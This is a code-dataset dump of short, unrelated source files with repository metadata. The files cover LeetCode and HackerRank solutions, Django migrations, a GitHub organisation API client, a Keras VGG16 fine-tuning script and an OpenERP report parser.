#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
|
[
"[email protected]"
] | |
d5f34735f201edeb1130c4cb2a9efc396cbf184e
|
1ec8734beba25739979cbd4a9414a95273cce6aa
|
/10.9/移除元素.py
|
f3a3c26997d12fbc85a770412e56ce40c9f3a40b
|
[] |
no_license
|
MATATAxD/untitled1
|
4431e4bc504e74d9a96f54fd6065ce46d5d9de40
|
18463f88ce60036959aabedabf721e9d938bacfb
|
refs/heads/master
| 2023-01-01T23:16:30.140947 | 2020-10-23T04:32:38 | 2020-10-23T04:32:38 | 306,529,260 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 329 |
py
|
from typing import List
def removeElement(nums: List[int], val: int) -> int:
    """Remove every occurrence of ``val`` from ``nums`` in place.

    Surviving elements are compacted to the front (relative order kept);
    returns the new logical length. Elements past that index are garbage.
    """
    write = 0
    for item in nums:
        if item != val:
            # Writes never pass the read position, so iterating while
            # assigning by index is safe.
            nums[write] = item
            write += 1
    return write
# Quick manual check: 1 occurs once, so five elements remain -> prints 5.
a = [1,2,3,4,5,6]
print(removeElement(a,1))
|
[
"[email protected]"
] | |
a7438ca02484cd42c1d46f32f2b6415efa83040e
|
cadb25b610777d1a91404c7dcfe3d29ca1ddd542
|
/apps/localidades/migrations/0010_alter_localidade_nomelocalidade.py
|
cb9f7aeb7196267ac6b6462739e16d51937b8d84
|
[] |
no_license
|
luanaAlm/sistema_ebd
|
851b8d98979e33187ec68b301910fe0c309a1ce2
|
ec6a97ddf413e5b10ddff20a781e37ddce77794d
|
refs/heads/main
| 2023-08-28T01:10:27.381064 | 2021-10-18T23:11:25 | 2021-10-18T23:11:25 | 415,992,258 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 439 |
py
|
# Generated by Django 3.2.7 on 2021-10-06 18:00
from django.db import migrations, models
class Migration(migrations.Migration):
    """Relabel Localidade.nomeLocalidade with the verbose name 'Igreja'."""

    dependencies = [
        ('localidades', '0009_alter_localidade_nomelocalidade'),
    ]

    operations = [
        migrations.AlterField(
            model_name='localidade',
            name='nomeLocalidade',
            field=models.CharField(max_length=100, verbose_name='Igreja'),
        ),
    ]
|
[
"[email protected]"
] | |
13279672b8c47331a37e9052b40787fc939702ac
|
5b85703aa0dd5a6944d99370a5dde2b6844517ec
|
/03.Python/15.ZerosandOnes.py
|
4d5e2053608bce9ef159ceccd2e274087611e083
|
[] |
no_license
|
alda07/hackerrank
|
255329196e6a4b9d598c3f51790caf4a99a755bc
|
a09091f859e87462c95ee856cbbd0ad9b5992159
|
refs/heads/master
| 2021-10-24T07:38:34.795632 | 2019-03-23T17:29:32 | 2019-03-23T17:29:32 | 90,329,292 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 353 |
py
|
# HackerRank "Zeros and Ones": read an array shape and print the matching
# integer-filled numpy.zeros / numpy.ones arrays.
import numpy

# Shape arrives as whitespace-separated integers, e.g. "3 3" -> [3, 3].
list_i = list(map(int, input().split()))
# Fix: numpy.int was only a deprecated alias of the builtin int and was
# removed in NumPy 1.24 (AttributeError since then); the builtin produces
# the same arrays.
print(numpy.zeros(list_i, dtype=int))
print(numpy.ones(list_i, dtype=int))
|
[
"[email protected]"
] | |
dd7c42bf3677ff4d5c0535593c8a3d205b5bbb4f
|
9404a8593ff2d82133897c9e187523d301df7888
|
/0x09-Unittests_and_integration_tests/client.py
|
09fe617f4bf9b728195056ec7874888a22e52d18
|
[] |
no_license
|
emna7/holbertonschool-web_back_end
|
ac2bc16e47f464530c4dee23497488c77377977e
|
744e6cb3bb67b2caa30f967708243b5474046961
|
refs/heads/main
| 2023-03-06T17:56:10.699982 | 2021-02-12T21:24:04 | 2021-02-12T21:24:04 | 305,394,170 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,473 |
py
|
#!/usr/bin/env python3
"""A github org client
"""
from typing import (
List,
Dict,
)
from utils import (
get_json,
access_nested_map,
memoize,
)
class GithubOrgClient:
    """GitHub organisation API client.

    Fetches JSON payloads for one organisation; @memoize caches each
    endpoint so it is requested at most once per instance.
    """
    # Template for the org endpoint, filled with the org login name.
    ORG_URL = "https://api.github.com/orgs/{org}"

    def __init__(self, org_name: str) -> None:
        """Init method of GithubOrgClient"""
        self._org_name = org_name

    @memoize
    def org(self) -> Dict:
        """Return (and cache) the organisation's JSON payload."""
        return get_json(self.ORG_URL.format(org=self._org_name))

    @property
    def _public_repos_url(self) -> str:
        """Repos-listing URL taken from the org payload's "repos_url" field."""
        # NOTE: self.org is accessed without parentheses -- memoize
        # presumably exposes it property-style; verify against utils.memoize.
        return self.org["repos_url"]

    @memoize
    def repos_payload(self) -> Dict:
        """Return (and cache) the JSON list of the org's repositories."""
        return get_json(self._public_repos_url)

    def public_repos(self, license: str = None) -> List[str]:
        """Return repo names, optionally filtered by license key.

        license: license key (e.g. "apache-2.0"); None keeps every repo.
        """
        json_payload = self.repos_payload
        public_repos = [
            repo["name"] for repo in json_payload
            if license is None or self.has_license(repo, license)
        ]
        return public_repos

    @staticmethod
    def has_license(repo: Dict[str, Dict], license_key: str) -> bool:
        """True iff repo["license"]["key"] == license_key; False when absent."""
        assert license_key is not None, "license_key cannot be None"
        try:
            has_license = access_nested_map(repo, ("license", "key")) == license_key
        except KeyError:
            # Repo has no license block at all.
            return False
        return has_license
|
[
"[email protected]"
] | |
ac60830bcb8ab8d05d3b4a995a1b9e7f2e93a2fa
|
2f2e9cd97d65751757ae0a92e8bb882f3cbc5b5b
|
/665.非递减数列.py
|
69ccfdcba89fb3679104b70233a147b4b5ee3c0d
|
[] |
no_license
|
mqinbin/python_leetcode
|
77f0a75eb29f8d2f9a789958e0120a7df4d0d0d3
|
73e0c81867f38fdf4051d8f58d0d3dc245be081e
|
refs/heads/main
| 2023-03-10T18:27:36.421262 | 2021-02-25T07:24:10 | 2021-02-25T07:24:10 | 314,410,703 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 594 |
py
|
#
# @lc app=leetcode.cn id=665 lang=python3
#
# [665] 非递减数列
#
# @lc code=start
class Solution:
    def checkPossibility(self, nums: List[int]) -> bool:
        """LeetCode 665: can nums become non-decreasing by changing at
        most one element?  Repairs violations in place as it scans."""
        edits = 0
        for idx in range(len(nums) - 1):
            if nums[idx] <= nums[idx + 1]:
                continue
            edits += 1
            if idx > 0:
                if nums[idx - 1] <= nums[idx + 1]:
                    # Lowering nums[idx] keeps the prefix sorted.
                    nums[idx] = nums[idx - 1]
                else:
                    # Otherwise raise the successor instead.
                    nums[idx + 1] = nums[idx]
            if edits > 1:
                return False
        return True
# @lc code=end
|
[
"[email protected]"
] | |
27d214b5b033cb21e812b5568854396b459d8ab9
|
bdd40ea113fdf2f04ef7d61a096a575322928d1d
|
/Rupesh/DjangoTutorial/TOdo/TOdo/Task/migrations/0002_auto_20200219_0600.py
|
56b743b8b63b2342fd7f88303c0256f187fcae5f
|
[] |
no_license
|
rupesh7399/rupesh
|
3eebf924d33790c29636ad59433e10444b74bc2f
|
9b746acf37ab357c147cdada1de5458c5fc64f53
|
refs/heads/master
| 2020-12-22T05:01:29.176696 | 2020-03-03T10:32:36 | 2020-03-03T10:32:36 | 202,111,967 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 357 |
py
|
# Generated by Django 2.2 on 2020-02-19 06:00
from django.db import migrations, models
class Migration(migrations.Migration):
    """Redefine Task.lastDate as a plain DateField (no extra options)."""

    dependencies = [
        ('Task', '0001_initial'),
    ]

    operations = [
        migrations.AlterField(
            model_name='task',
            name='lastDate',
            field=models.DateField(),
        ),
    ]
|
[
"[email protected]"
] | |
adbedc8206330810c70cdc570b3140a5f632e51e
|
f7e5a206c5ca75043b662c8f9905a070b7e37060
|
/cart/views.py
|
54f1f59dc1f21f1a4b7c6b04e842911c7f358e15
|
[] |
no_license
|
sweetmentor/Str4-eCommerce-App
|
4d22945f7b5dc0a40b577b8ed45caf22c9e644d4
|
e50edff9183a207c8e7daff16136059fcb5f9002
|
refs/heads/master
| 2020-03-22T00:26:36.973580 | 2019-01-29T01:13:56 | 2019-01-29T01:13:56 | 139,244,613 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,193 |
py
|
from django.shortcuts import render, redirect, get_object_or_404, HttpResponse
from product.models import Product
from .utils import get_cart_items_and_total
# Create your views here.
def view_cart(request):
    """Render the cart page for whatever is in the session cart."""
    session_cart = request.session.get('cart', {})
    return render(request, "cart/cart.html", get_cart_items_and_total(session_cart))
def remove_from_cart(request):
    """Decrement the posted product's quantity in the session cart.

    The item is dropped entirely once its quantity hits zero; always
    redirects back to the cart page.
    """
    id = request.POST['product_id']
    # 404s when the posted id does not match a real product.
    product = get_object_or_404(Product, pk=id)
    cart = request.session.get('cart', {})
    if id in cart:
        # Subtract 1 from the quantity
        cart[id] -= 1
        # If the quantity is now 0, then delete the item
        if cart[id] == 0:
            del cart[id]
    request.session['cart'] = cart
    return redirect('view_cart')
def add_to_cart(request):
    """Add one unit of the posted product to the session cart, then go home."""
    product_id = request.POST['product_id']
    # Validates the id -- 404s when no such product exists.
    get_object_or_404(Product, pk=product_id)
    session_cart = request.session.get('cart', {})
    session_cart[product_id] = session_cart.get(product_id, 0) + 1
    request.session['cart'] = session_cart
    return redirect("/")
|
[
"[email protected]"
] | |
42d2ccd0a08c1520cae02783637eee771aedda4f
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_196/ch31_2020_03_14_15_42_06_957078.py
|
7229a92343174b1d0b472e5e5af883e664d7d8d9
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 163 |
py
|
def eh_primo(a):
    """Return True if ``a`` is a prime number, else False.

    The original body was a SyntaxError (an ``elif`` following a plain
    statement) and referenced ``x`` before assignment; rewritten as a
    standard trial-division test over odd divisors up to sqrt(a).
    """
    if a < 2:
        # 0, 1 and negatives are not prime.
        return False
    if a == 2:
        return True
    if a % 2 == 0:
        return False
    d = 3
    while d * d <= a:
        if a % d == 0:
            return False
        d += 2
    return True
|
[
"[email protected]"
] | |
91ad79fe802f8441997c7574f787866330f8fdaf
|
7a0334693cd31fe4fdef06324ede0d72c6530c40
|
/event_crud/migrations/0001_initial.py
|
414c9f942def602edac8017b35088131a4404944
|
[] |
no_license
|
lilitotaryan/eventnet-back-end
|
7949668a4108b36a6e1a2f6439d6e966991d64ba
|
5828b1520b8feeb363fdac0b85b08e001572991e
|
refs/heads/main
| 2023-02-18T02:24:45.475978 | 2021-01-22T18:15:42 | 2021-01-22T18:15:42 | 332,027,025 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,402 |
py
|
# Generated by Django 2.2.5 on 2020-02-26 19:01
import authentication.utils
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial migration for event_crud: create the Event model."""

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('user_crud', '0005_remove_customuser_phone_number'),
    ]

    operations = [
        migrations.CreateModel(
            name='Event',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(default=None, max_length=100)),
                ('description', models.CharField(default=None, max_length=500)),
                # Default is the project's "current time" helper, evaluated per row.
                ('date', models.DateTimeField(default=authentication.utils.get_current_time)),
                ('is_responsible', models.BooleanField(default=False)),
                ('contact_phone_number', models.CharField(default=None, max_length=100, unique=True)),
                # SET_NULL keeps events alive when their address is deleted.
                ('address', models.ForeignKey(default=None, null=True, on_delete=django.db.models.deletion.SET_NULL, to='user_crud.Address')),
                ('categories', models.ManyToManyField(blank=True, to='user_crud.Category')),
                ('users', models.ManyToManyField(blank=True, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
|
[
"[email protected]"
] | |
122a05dc3115f6ed66c2747d3dc1e78c44cd4955
|
52e0e1ef7675d8bac51899f23b2722e7e7f58992
|
/core/data/base_collector.py
|
972479bf987185887d7e79d61ee4b166286f1b46
|
[
"Apache-2.0"
] |
permissive
|
knowmefly/DI-drive
|
2c8963a04d00aa8b3c3354630b6df9e3e6a6770e
|
ade3c9dadca29530f20ab49b526ba32818ea804b
|
refs/heads/main
| 2023-07-08T14:40:39.625522 | 2021-07-21T15:54:48 | 2021-07-21T15:54:48 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,420 |
py
|
import copy
from abc import abstractmethod
from typing import Any, Dict
from easydict import EasyDict
from ding.utils import EasyTimer
class BaseCollector(object):
    """Abstract base for collectors that run a policy in an environment.

    Handles config merging and env/policy plumbing; subclasses implement
    reset/close/collect.
    """
    # Class-level default config; subclasses extend it and default_config()
    # snapshots it per class.
    config = dict()

    def __init__(
            self,
            cfg: Dict,
            env: Any = None,
            policy: Any = None,
    ) -> None:
        # A raw dict (no 'cfg_type' marker) is merged on top of this class's
        # defaults; a pre-built config is trusted as complete.
        if 'cfg_type' not in cfg:
            self._cfg = self.__class__.default_config()
            self._cfg.update(cfg)
        else:
            self._cfg = cfg
        self._end_flag = False
        self._timer = EasyTimer()
        # env/policy are optional here and may be injected later via the
        # property setters.
        if env is not None:
            self.env = env
        if policy is not None:
            self.policy = policy

    @property
    def env(self) -> Any:
        return self._env

    @env.setter
    def env(self, _env: Any) -> None:
        self._env = _env

    @property
    def policy(self) -> Any:
        return self._policy

    @policy.setter
    def policy(self, _policy: Any) -> None:
        self._policy = _policy

    @abstractmethod
    def reset(self) -> Any:
        raise NotImplementedError

    @abstractmethod
    def close(self) -> Any:
        raise NotImplementedError

    @abstractmethod
    def collect(self) -> Any:
        raise NotImplementedError

    @classmethod
    def default_config(cls: type) -> EasyDict:
        """Per-class snapshot of ``config`` with a 'cfg_type' marker added."""
        cfg = EasyDict(cls.config)
        cfg.cfg_type = cls.__name__ + 'Config'
        # Deep copy so callers cannot mutate the shared class-level dict.
        return copy.deepcopy(cfg)
|
[
"[email protected]"
] | |
7b2f3ffb266a6b73b251aa0bed91d044d1201bd4
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03162/s990109089.py
|
40f2258c0867493398fd6c13585706e99574813b
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 363 |
py
|
# DP over n days with 3 mutually exclusive daily choices: the same choice
# may not be taken on two consecutive days (AtCoder problem p03162).
n=int(input())
happines=[list(map(int,input().split())) for _ in range(n)]
# solution[i][j] = best total happiness through day i if choice j is
# taken on day i.
solution=[[0,0,0] for _ in range(n)]
solution[0][0]=happines[0][0]
solution[0][1]=happines[0][1]
solution[0][2]=happines[0][2]
for i in range(1,n):
    for j in range(3):
        # Transition from the best of the two *other* choices yesterday.
        solution[i][j]=happines[i][j]+max(solution[i-1][(j+1)%3],solution[i-1][(j+2)%3])
print(max(solution[-1]))
|
[
"[email protected]"
] | |
e3b3126e6676609e20aa10a8b485b3a059b0fd77
|
8787b2fbb5017b61dcf6075a5261071b403847bf
|
/Programmers/N으로 표현.py
|
21d160641aee1be033211795680b2a0e5c76564b
|
[] |
no_license
|
khw5123/Algorithm
|
a6fe0009e33289813959553c2366d77c93d7b4b9
|
323a829f17a10276ab6f1aec719c496a3e76b974
|
refs/heads/master
| 2023-01-02T00:12:21.848924 | 2020-10-23T06:37:41 | 2020-10-23T06:37:41 | 282,162,235 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,202 |
py
|
def calc(s, N, number):
    """Evaluate token list ``s`` strictly left to right (no precedence).

    ``s`` holds single-character strings: runs of the digit ``N`` form
    multi-digit numbers (['5','5','+','5'] -> 55 + 5); '+', '-', '*', '/'
    separate them, with '/' as integer division.
    NOTE(review): assumes s starts with a digit and ends with a digit --
    confirm against solve(), the only caller.
    """
    result = 0
    start = 0
    tmp = ''
    # Read the leading number (initial run of the digit N).
    for i in range(len(s)):
        if s[i] != str(N):
            start = i
            result = int(tmp)
            break
        else:
            tmp += s[i]
    tmp = ''
    operator = []
    # Fold each subsequent "<op><number>" pair into result, left to right.
    for i in range(start, len(s)):
        if s[i] == str(N):
            tmp += s[i]
            if i == len(s) - 1 and len(operator) != 0:
                # Final token: apply the still-pending operator.
                if operator[0] == '+':
                    result += int(tmp)
                elif operator[0] == '-':
                    result -= int(tmp)
                elif operator[0] == '*':
                    result *= int(tmp)
                elif operator[0] == '/':
                    result //= int(tmp)
        else:
            if len(operator) == 1:
                # A new operator arrives: first apply the pending one to the
                # number accumulated in tmp.
                if operator[0] == '+':
                    result += int(tmp)
                elif operator[0] == '-':
                    result -= int(tmp)
                elif operator[0] == '*':
                    result *= int(tmp)
                elif operator[0] == '/':
                    result //= int(tmp)
                tmp = ''
                operator.pop()
            operator.append(s[i])
    return result
def solve(s, N, number):
    """DFS over expressions built from the digit N and the four operators.

    ``s`` is the current token list (mutated in place, backtracked with
    pop).  Returns the minimum count of N's needed to reach ``number``,
    with 9 as the "not reachable within 8 uses" sentinel.
    """
    answer = 9
    if s.count(str(N)) < 9:
        if s[-1] == str(N):
            # Expression currently ends in a digit, so it is evaluable.
            # eval() honours precedence while calc() goes left to right;
            # hitting `number` under either interpretation counts.
            if eval(''.join(s)) == number or calc(s, N, number) == number:
                answer = min(answer, s.count(str(N)))
            # Branch 1: extend the current number with one more digit N.
            s.append(str(N))
            answer = min(answer, solve(s, N, number))
            s.pop()
        if s[-1] != '+' and s[-1] != '-' and s[-1] != '*' and s[-1] != '/':
            # Branch 2: after a complete number, try each operator.
            s.append('+')
            answer = min(answer, solve(s, N, number))
            s.pop()
            s.append('-')
            answer = min(answer, solve(s, N, number))
            s.pop()
            s.append('*')
            answer = min(answer, solve(s, N, number))
            s.pop()
            s.append('/')
            answer = min(answer, solve(s, N, number))
            s.pop()
            return answer
    return answer
def solution(N, number):
    """Minimal count of digit N needed to express `number`; -1 if over 8."""
    best = solve([str(N)], N, number)
    return best if best < 9 else -1
|
[
"[email protected]"
] | |
2edda813a68b94ffdf1c3d6201c1cff73d0ddad3
|
aaad70e69d37f92c160c07e4ca03de80becf2c51
|
/filesystem/usr/lib/python3.6/asyncio/base_events.py
|
32b4f0adcd1093409fe44dc22121f8affc046568
|
[] |
no_license
|
OSWatcher/ubuntu-server
|
9b4dcad9ced1bff52ec9cdb4f96d4bdba0ad3bb9
|
17cb333124c8d48cf47bb9cec1b4e1305626b17a
|
refs/heads/master
| 2023-02-10T18:39:43.682708 | 2020-12-26T01:02:54 | 2020-12-26T01:02:54 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 183 |
py
|
{
"MIME": "text/plain",
"inode_type": "REG",
"magic_type": "Python script, ASCII text executable",
"mode": "-rw-r--r--",
"sha1": "23f1c44c157099ef5d66c87ba91eb7128afa4867"
}
|
[
"[email protected]"
] | |
2ad7f8907bd282c066e9db3e2553e053f204e9a8
|
a70778e730f6d3e3be04ba449e6ed0a9ff7d7e6d
|
/classifier_5b_rough_fine_tune_from3z.py
|
4e132cf8513dd1cd901bd4a0c5a2f1a6c88b44fc
|
[] |
no_license
|
previtus/two_classes_ml
|
0351e62544cc46f9c09847de641fd84aac94d38b
|
0f780e2e3736e6280dddd25540911d60c9d721d8
|
refs/heads/master
| 2021-05-10T10:05:38.526602 | 2018-08-06T19:59:26 | 2018-08-06T19:59:26 | 118,946,345 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 7,192 |
py
|
img_size = None #(20,20)
img_size = (150,150)
epochs_first = 10
epochs_second = 40
batch_size = 16
validation_split = 0.3
RESCALE = 1. / 255 # put data from 0-255 into 0-1
# GET ALL DATA
# define the classes in here directly
from data_handling import LOAD_DATASET, LOAD_DATASET_VAL_LONGER_THR2, sample_random_subset_from_list, y_from_x
from data_handling import load_images_with_keras, convert_labels_to_int, convert_back_from_categorical_data, how_many_are_in_each_category
TRAIN_WITH_LONGER_THAN = 1000
TRAIN_C_balanced = 5000
SPLIT = 0.3 # 70% and 30%
FOLDER = 'chillan_saved_images_square_224_ALL_with_len'
folders = ['data/'+FOLDER+'/LP/', 'data/'+FOLDER+'/TR/', 'data/'+FOLDER+'/VT/']
VAL_ONLY_LONGER_THR2 = 1000
BalancedVal = False
StillBalance10to1to1 = True
X_TRAIN_BAL, X_VAL_FULL = LOAD_DATASET_VAL_LONGER_THR2(
TRAIN_WITH_LONGER_THAN, TRAIN_C_balanced, SPLIT, FOLDER, folders, VAL_ONLY_LONGER_THR2,
BalancedVal=BalancedVal,StillBalance10to1to1 = StillBalance10to1to1)
specialname = '__Finetuned'
classes_names = ['LP', 'TR', 'VT']
num_classes = len(classes_names)
labels_texts = classes_names
labels = [0, 1, 2]
DROP=0.2
SUBSET_FOR_TRAIN = 8000
SUBSET_FOR_VAL = 8000
############ Whats bellow doesn't have to be changed dramatically
X_TRAIN_BAL,_ = sample_random_subset_from_list(X_TRAIN_BAL, SUBSET_FOR_TRAIN)
Y_TRAIN_BAL = y_from_x(X_TRAIN_BAL)
X_VAL,_ = sample_random_subset_from_list(X_VAL_FULL, SUBSET_FOR_VAL)
Y_VAL = y_from_x(X_VAL)
from keras.preprocessing.image import load_img, img_to_array
import numpy as np
import keras
from matplotlib import pyplot as plt
print("Loading image data!")
# X_TRAIN_BAL, Y_TRAIN_BAL
x_train = load_images_with_keras(X_TRAIN_BAL, target_size=img_size)
y_train = convert_labels_to_int(Y_TRAIN_BAL, classes_names, labels)
y_train = keras.utils.to_categorical(y_train, num_classes=num_classes)
# X_VAL, Y_VAL
x_test = load_images_with_keras(X_VAL, target_size=img_size)
y_test = convert_labels_to_int(Y_VAL, classes_names, labels)
y_test = keras.utils.to_categorical(y_test, num_classes=num_classes)
print("x_train:", x_train.shape)
print("y_train:", y_train.shape)#, y_train[0:10])
print("x_test:", x_test.shape)
print("y_test:", y_test.shape)#, y_test[0:10])
print("---")
print("SanityCheck Test dist:")
how_many_are_in_each_category(convert_back_from_categorical_data(y_test))
print("SanityCheck Train dist:")
how_many_are_in_each_category(convert_back_from_categorical_data(y_train))
print("---")
x_train *= RESCALE
x_test *= RESCALE
# =============================
# ==============================================================================
# ==============================================================================
# ==============================================================================
# ==============================================================================
# ROUGH
from keras import optimizers
from keras.applications import VGG16
vgg_conv = VGG16(weights='imagenet', include_top=False, input_shape=(img_size[0], img_size[1], 3))
print("calculating high lvl features...")
X_bottleneck_train = vgg_conv.predict(x_train)
X_bottleneck_test = vgg_conv.predict(x_test)
print("X_bottleneck_train:", X_bottleneck_train.shape)
print("y_test:", y_train.shape)#, y_train[0:10])
print("X_bottleneck_test:", X_bottleneck_test.shape)
print("y_test:", y_test.shape)#, y_test[0:10])
print("---")
print("train_data.shape[1:]", X_bottleneck_train.shape[1:])
from keras.models import Sequential
from keras.layers import Dropout, Flatten, Dense
classifier_model = Sequential()
classifier_model.add(Flatten(input_shape=X_bottleneck_train.shape[1:]))
classifier_model.add(Dense(256, activation='relu'))
classifier_model.add(Dropout(0.5))
classifier_model.add(Dense(num_classes, activation='sigmoid'))
print("FIRST ROUGH MODEL:")
classifier_model.summary()
#classifier_model.compile(loss='categorical_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4),metrics=['accuracy'])
classifier_model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy'])
# ==============================================================================
# TRAIN 1
# ==============================================================================
#
history1 = classifier_model.fit(X_bottleneck_train, y_train,
batch_size=batch_size,
epochs=epochs_first,
validation_data=(X_bottleneck_test, y_test),
verbose=1)
# Works well, gets us till cca 96% even in 10 epochs (possibly even 5)
# ==============================================================================
# ==============================================================================
# Freeze the layers except the last 4 layers
for layer in vgg_conv.layers[:-4]:
layer.trainable = False
# Check the trainable status of the individual layers
for layer in vgg_conv.layers:
print(layer, layer.trainable)
from keras import models
from keras import layers
# Create the model
fine_model = models.Sequential()
fine_model.add(vgg_conv)
fine_model.add(classifier_model)
print("SECOND FINE MODEL:")
fine_model.summary()
# Compile the model
# TRY other?
#fine_model.compile(loss='categorical_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4),metrics=['accuracy'])
# clip norm didnt help with loss: nan
#fine_model.compile(loss='categorical_crossentropy', optimizer=optimizers.RMSprop(lr=1e-4, clipnorm=1.),metrics=['accuracy'])
#model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy']) # default lr lr=0.001
# TRY
sgd = optimizers.SGD(lr=1e-3, decay=1e-6, momentum=0.9, nesterov=True)
fine_model.compile(loss='categorical_crossentropy', optimizer=sgd,metrics=['accuracy'])
# ==============================================================================
# TRAIN 2
# ==============================================================================
#
history2 = fine_model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs_second,
validation_data=(x_test, y_test),
verbose=1)
# Whoops, sudden drop to loss: nan
# ==============================================================================
# REPORT
# ==============================================================================
#
#print(history1.history)
#print(history2.history)
split_n = len(history1.history['val_loss'])
# val_loss', 'val_acc', 'loss', 'acc
history1.history['val_loss'] += history2.history['val_loss']
history1.history['val_acc'] += history2.history['val_acc']
history1.history['loss'] += history2.history['loss']
history1.history['acc'] += history2.history['acc']
from visualize_history import visualize_history
plt = visualize_history(history1.history, show_also='acc', show=False, save=False)
#visualize_history(history2.history, show_also='acc', save=False, save_path='classifier5b_'+str(epochs)+'epochs_')
plt.axvline(x=split_n-0.5, linestyle='dashed', color='black')
filename = 'classifier5b_CHILL_'+str(epochs_first)+'+'+str(epochs_second)+'epochs_'
plt.savefig(filename)
plt.show()
fine_model.save('5b_final_fine_model.h5')
|
[
"[email protected]"
] | |
8871896d5379ec5750e6fb6433622c846811c30b
|
b8fed8222b41e447cd5ce83513eb4d014c01742b
|
/ad_report_salesadmin/po/po_form.py
|
ae2a831ae88665d254b25eafbddb16d0e61cf761
|
[] |
no_license
|
lajayuhniyarsyah/ERP-Supra
|
e993d8face6e022b6f863d1dff7cb51cda36be8d
|
5a64dbb57ee40070354926700091fb9025c1350c
|
refs/heads/master
| 2021-01-25T22:09:46.306990 | 2017-11-08T05:32:04 | 2017-11-08T05:32:04 | 23,605,825 | 0 | 10 | null | 2017-11-08T05:32:05 | 2014-09-03T03:58:28 |
Python
|
UTF-8
|
Python
| false | false | 2,035 |
py
|
import time
from report import report_sxw
from osv import osv,fields
from report.render import render
#from ad_num2word_id import num2word
import pooler
#from report_tools import pdf_fill,pdf_merge
from tools.translate import _
import tools
from tools.translate import _
import decimal_precision as dp
#from ad_amount2text_idr import amount_to_text_id
from tools import amount_to_text_en
class po_form(report_sxw.rml_parse):
    """Parser for the purchase-order "PO Form" report.

    Exposes ``get_object`` to the report template so it can browse the
    record(s) the report was launched on.
    """

    def __init__(self, cr, uid, name, context):
        # BUG FIX: the original called super(invoice_form, ...), but no class
        # named invoice_form exists in this module — instantiating the parser
        # raised NameError. The class is po_form.
        super(po_form, self).__init__(cr, uid, name, context=context)
        self.localcontext.update({
            'get_object': self._get_object,
        })

    def _get_object(self, data):
        """Browse and return the records identified by the report ``data``.

        ``data`` must contain the source ``model`` name and the record ``id``
        (as passed by the report launcher).
        """
        obj_data = self.pool.get(data['model']).browse(self.cr, self.uid, [data['id']])
        return obj_data
report_sxw.report_sxw('report.po.form', 'purchase.order', 'ad_report_salesadmin/po/po_form.mako', parser=po_form,header=False)
|
[
"[email protected]"
] | |
f040cc2c3bcc0b27174802337d61601ed34c13a6
|
38c1e589388752100c4afcbe0b445bfff033bab2
|
/friend/migrations/0003_auto_20200819_1444.py
|
0bf415da2081910e1e2d42a9465ac80b351f2e6a
|
[] |
no_license
|
ruhullahil/Codingwithmitch-Chat
|
02c83f17fd51329fb3e4c0af74f1890ffd7ac012
|
dd854e6357e98684c3fe7c87da028de1f356030b
|
refs/heads/master
| 2023-01-03T00:38:38.225127 | 2020-10-29T21:09:37 | 2020-10-29T21:09:37 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 538 |
py
|
# Generated by Django 2.2.15 on 2020-08-19 21:44
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated (Django 2.2): redeclares FriendList.user as a OneToOne
    # link to the configured AUTH_USER_MODEL, cascading on delete.

    dependencies = [
        ('friend', '0002_auto_20200819_1443'),
    ]

    operations = [
        migrations.AlterField(
            model_name='friendlist',
            name='user',
            field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='user', to=settings.AUTH_USER_MODEL),
        ),
    ]
|
[
"[email protected]"
] | |
7c3de6ac23a5796d7675e6ed3bf8151de5a1c8c6
|
a6b6294dd573e7a8429f6e1817a0598c7b315c5e
|
/examples/finance_vix.py
|
d0a1e8139e68366c05b1e389003532561c2be261
|
[
"MIT"
] |
permissive
|
openknowledge-archive/datapackage-bigquery-py
|
4bef9c960c4efc9131d4673fab1f999f5ae09221
|
f1d822a1846eac4cfcdfd0f9e94bc27d2458f00b
|
refs/heads/master
